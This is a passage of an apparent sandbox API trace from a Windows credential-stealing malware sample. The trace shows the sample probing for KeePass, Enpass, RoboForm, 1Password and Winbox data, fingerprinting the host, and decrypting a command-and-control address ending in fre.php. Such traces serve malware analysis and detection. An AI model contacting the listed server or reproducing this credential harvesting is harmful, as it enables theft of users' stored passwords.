() returned 0x6a0000 [0130.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f44) returned 0x6bc960 [0130.338] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.338] wvsprintfW (in: param_1=0x6bc960, param_2="%s", arglist=0x19fb30 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 31 [0130.338] GetProcessHeap () returned 0x6a0000 [0130.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x42) returned 0x6b5420 [0130.338] GetProcessHeap () returned 0x6a0000 [0130.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.340] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 1 [0130.340] GetProcessHeap () returned 0x6a0000 [0130.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.341] Sleep (dwMilliseconds=0xa) [0130.357] GetProcessHeap () returned 0x6a0000 [0130.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bc960 [0130.358] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.359] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\%s", arglist=0x19f8b0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdb") returned 37 [0130.359] GetProcessHeap () returned 0x6a0000 [0130.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4e) returned 0x6bac30 [0130.359] GetProcessHeap () returned 0x6a0000 [0130.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.360] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdb" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.kdb"), lpFindFileData=0x19f8c4 | out: lpFindFileData=0x19f8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="吠k꺘k")) returned 0xffffffff [0130.361] GetProcessHeap () returned 0x6a0000 [0130.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.361] GetProcessHeap () returned 0x6a0000 [0130.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5420 | out: hHeap=0x6a0000) returned 1 [0130.362] GetProcessHeap () returned 0x6a0000 [0130.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.364] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.365] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0130.365] GetProcessHeap () returned 0x6a0000 [0130.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f44) returned 0x6bc960 [0130.366] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.368] wvsprintfW (in: param_1=0x6bc960, param_2="%s", arglist=0x19fb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 29 [0130.368] GetProcessHeap () returned 0x6a0000 [0130.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4b98 [0130.368] GetProcessHeap () returned 0x6a0000 [0130.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.370] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0130.370] GetProcessHeap () returned 0x6a0000 [0130.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.371] Sleep (dwMilliseconds=0xa) [0130.407] GetProcessHeap () returned 0x6a0000 [0130.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bc960 [0130.408] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.409] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\%s", arglist=0x19f8e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdb") returned 35 [0130.409] GetProcessHeap () returned 0x6a0000 [0130.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4a) returned 0x6bac30 [0130.409] GetProcessHeap () returned 0x6a0000 [0130.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.410] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdb" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.kdb"), lpFindFileData=0x19f8f4 | out: lpFindFileData=0x19f8f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="䮘k꺘k")) returned 0xffffffff [0130.410] GetProcessHeap () returned 0x6a0000 [0130.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.411] GetProcessHeap () returned 0x6a0000 [0130.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4b98 | out: hHeap=0x6a0000) returned 1 [0130.411] GetProcessHeap () returned 0x6a0000 [0130.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.413] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.413] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0130.413] GetProcessHeap () returned 0x6a0000 [0130.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f52) returned 0x6bc960 [0130.414] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.415] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\Enpass", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Enpass") returned 38 [0130.415] GetProcessHeap () returned 0x6a0000 [0130.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x6bb0a8 [0130.415] GetProcessHeap () returned 0x6a0000 [0130.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.418] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\Enpass") returned 0 [0130.418] GetProcessHeap () returned 0x6a0000 [0130.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.419] GetProcessHeap () returned 0x6a0000 [0130.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb0a8 | out: hHeap=0x6a0000) returned 1 [0130.419] GetProcessHeap () returned 0x6a0000 [0130.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.420] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.421] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0130.421] GetProcessHeap () returned 0x6a0000 [0130.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f66) returned 0x6bc960 [0130.422] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.423] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\My RoboForm Data", arglist=0x19fb68 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My RoboForm Data") returned 48 [0130.423] GetProcessHeap () returned 0x6a0000 [0130.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6bb0a8 [0130.423] GetProcessHeap () returned 0x6a0000 [0130.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.424] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.425] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\My RoboForm Data") returned 0 [0130.425] GetProcessHeap () returned 0x6a0000 [0130.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb0a8 | out: hHeap=0x6a0000) returned 1 [0130.426] GetProcessHeap () returned 0x6a0000 [0130.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.426] GetProcessHeap () returned 0x6a0000 [0130.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.427] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.428] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0130.428] GetProcessHeap () returned 0x6a0000 [0130.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f58) returned 0x6bc960 [0130.462] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.463] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\1Password", arglist=0x19fb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\1Password") returned 41 [0130.463] GetProcessHeap () returned 0x6a0000 [0130.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x56) returned 0x6bb0a8 [0130.463] GetProcessHeap () returned 0x6a0000 [0130.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.465] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\1Password") returned 0 [0130.465] GetProcessHeap () returned 0x6a0000 [0130.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb0a8 | out: hHeap=0x6a0000) returned 1 [0130.466] GetProcessHeap () returned 0x6a0000 [0130.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.466] GetProcessHeap () returned 0x6a0000 [0130.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.467] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.467] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0130.467] GetProcessHeap () returned 0x6a0000 [0130.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6bc960 [0130.468] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.469] wvsprintfW (in: param_1=0x6bc960, param_2="Mikrotik\\Winbox", arglist=0x19fb5c | out: param_1="Mikrotik\\Winbox") returned 15 [0130.469] GetProcessHeap () returned 0x6a0000 [0130.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x22) returned 0x6b0be0 [0130.470] GetProcessHeap () returned 0x6a0000 [0130.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.487] PathFileExistsW (pszPath="Mikrotik\\Winbox") returned 0 [0130.488] GetProcessHeap () returned 0x6a0000 [0130.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.497] GetProcessHeap () returned 0x6a0000 [0130.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0be0 | out: hHeap=0x6a0000) returned 1 [0130.509] GetProcessHeap () returned 0x6a0000 [0130.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.565] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.565] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0130.566] GetProcessHeap () returned 0x6a0000 [0130.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bc960 [0130.566] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.567] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\%s", arglist=0x19f994 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0130.567] GetProcessHeap () returned 0x6a0000 [0130.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5c) returned 0x6bb0a8 [0130.567] GetProcessHeap () returned 0x6a0000 [0130.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.569] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0xffffffff [0130.569] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9"), lpSecurityAttributes=0x0) returned 1 [0130.571] GetProcessHeap () returned 0x6a0000 [0130.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f50) returned 0x6bc960 [0130.572] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.572] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\%s.%s", arglist=0x19f9a8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb") returned 55 [0130.572] GetProcessHeap () returned 0x6a0000 [0130.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x72) returned 0x6b8960 [0130.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb0a8 | out: hHeap=0x6a0000) returned 1 [0130.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.574] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.575] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x5b0000 [0130.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8960 | out: hHeap=0x6a0000) returned 1 [0130.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1388) returned 0x6bb458 [0130.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab4f0 [0130.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11c) returned 0x6bac30 [0130.577] RtlGetVersion (in: lpVersionInformation=0x6bac30 | out: lpVersionInformation=0x6bac30*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0130.577] GetProcessHeap () returned 0x6a0000 [0130.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.578] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fb18 | out: lpSystemTimeAsFileTime=0x19fb18*(dwLowDateTime=0x3cfe6918, dwHighDateTime=0x1d8604e)) [0130.578] GetProcessHeap () returned 0x6a0000 [0130.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7) returned 0x6ba9c0 [0130.578] GetProcessHeap () returned 0x6a0000 [0130.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1a5) returned 0x6bae98 [0130.578] GetProcessHeap () returned 0x6a0000 [0130.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0000) returned 0x5c2020 [0130.614] GetProcessHeap () returned 0x6a0000 [0130.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5c2020 | out: hHeap=0x6a0000) returned 1 [0130.626] GetProcessHeap () returned 0x6a0000 [0130.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bc960 [0130.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.628] GetUserNameW (in: lpBuffer=0x6bc960, pcbBuffer=0x19fb74 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb74) returned 1 [0130.631] GetProcessHeap () returned 0x6a0000 [0130.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.631] GetProcessHeap () returned 0x6a0000 [0130.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bc960 [0130.632] GetComputerNameW (in: lpBuffer=0x6bc960, nSize=0x19fb74 | out: lpBuffer="XC64ZB", nSize=0x19fb74) returned 1 [0130.632] GetProcessHeap () returned 0x6a0000 [0130.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.633] GetCurrentThread () returned 0xfffffffe [0130.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.634] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x0) returned 0 [0130.634] GetLastError () returned 0x3f0 [0130.634] GetCurrentProcess () returned 0xffffffff [0130.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.635] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x210) returned 1 [0130.635] GetProcessHeap () returned 0x6a0000 [0130.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bc960 [0130.635] GetProcessHeap () returned 0x6a0000 [0130.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bd040 [0130.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.637] GetTokenInformation (in: TokenHandle=0x210, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fb70 | out: TokenInformation=0x0, ReturnLength=0x19fb70) returned 0 [0130.637] GetProcessHeap () returned 0x6a0000 [0130.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0130.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.638] GetTokenInformation (in: TokenHandle=0x210, TokenInformationClass=0x1, TokenInformation=0x6b0af0, TokenInformationLength=0x24, ReturnLength=0x19fb70 | out: TokenInformation=0x6b0af0, ReturnLength=0x19fb70) returned 1 [0130.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.639] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x6b0af8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x6bc960, cchName=0x19fb60, ReferencedDomainName=0x6bd040, cchReferencedDomainName=0x19fb64, peUse=0x19fb5c | out: Name="RDhJ0CNFevzX", cchName=0x19fb60, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fb64, peUse=0x19fb5c) returned 1 [0130.642] GetProcessHeap () returned 0x6a0000 [0130.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f44) returned 0x6be760 [0130.643] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.644] wvsprintfW (in: param_1=0x6be760, param_2="%s", arglist=0x19fb4c | out: param_1="XC64ZB") returned 6 [0130.644] GetProcessHeap () returned 0x6a0000 [0130.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6ab760 [0130.644] GetProcessHeap () returned 0x6a0000 [0130.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be760 | out: hHeap=0x6a0000) returned 1 [0130.645] GetProcessHeap () returned 0x6a0000 [0130.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0130.646] CloseHandle (hObject=0x210) returned 1 [0130.646] GetProcessHeap () returned 0x6a0000 [0130.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd040 | out: hHeap=0x6a0000) returned 1 [0130.646] GetProcessHeap () returned 0x6a0000 [0130.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.646] GetProcessHeap () returned 0x6a0000 [0130.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab760 | out: hHeap=0x6a0000) returned 1 [0130.647] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.647] GetDesktopWindow () returned 0x10010 [0130.648] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.649] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fb68 | out: lpRect=0x19fb68) returned 1 [0130.651] GetProcessHeap () returned 0x6a0000 [0130.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6baa30 [0130.651] GetProcessHeap () returned 0x6a0000 [0130.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0130.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.653] GetUserNameW (in: lpBuffer=0x19f968, pcbBuffer=0x19fb70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb70) returned 1 [0130.654] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x74d00000 [0130.904] GetProcAddress (hModule=0x74d00000, lpProcName="NetUserGetInfo") returned 0x6dc133a0 [0131.064] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fb74 | out: bufptr=0x6b47a8*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0xbb522, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0131.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0131.406] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb60, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fb68 | out: pSid=0x19fb68*=0x6ab760*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0131.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0131.429] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x6ab760*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fb6c | out: IsMember=0x19fb6c) returned 1 [0131.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0131.431] GetNativeSystemInfo (in: lpSystemInfo=0x19fb44 | out: lpSystemInfo=0x19fb44*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0131.464] GetProcessHeap () returned 0x6a0000 [0131.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b48c8 [0131.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0131.466] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f920*=0x0) returned 0 [0131.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0131.483] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f920*=0x6bac30) returned 1 [0131.493] GetProcessHeap () returned 0x6a0000 [0131.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0131.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0131.494] CryptImportKey (in: hProv=0x6bac30, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f924 | out: phKey=0x19f924*=0x6ad4a0) returned 1 [0131.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0131.496] CryptSetKeyParam (hKey=0x6ad4a0, dwParam=0x4, pbData=0x19f91c*=0x1, dwFlags=0x0) returned 1 [0131.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0131.497] CryptSetKeyParam (hKey=0x6ad4a0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0131.497] GetProcessHeap () returned 0x6a0000 [0131.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0131.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0131.498] CryptDecrypt (in: hKey=0x6ad4a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b48c8, pdwDataLen=0x19f974 | out: pbData=0x6b48c8, pdwDataLen=0x19f974) returned 1 [0131.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0131.502] CryptDestroyKey (hKey=0x6ad4a0) returned 1 [0131.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0131.574] CryptReleaseContext (hProv=0x6bac30, dwFlags=0x0) returned 1 [0131.574] GetProcessHeap () returned 0x6a0000 [0131.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bd1c8 [0131.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0131.575] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0131.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0131.576] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0131.577] LoadLibraryW 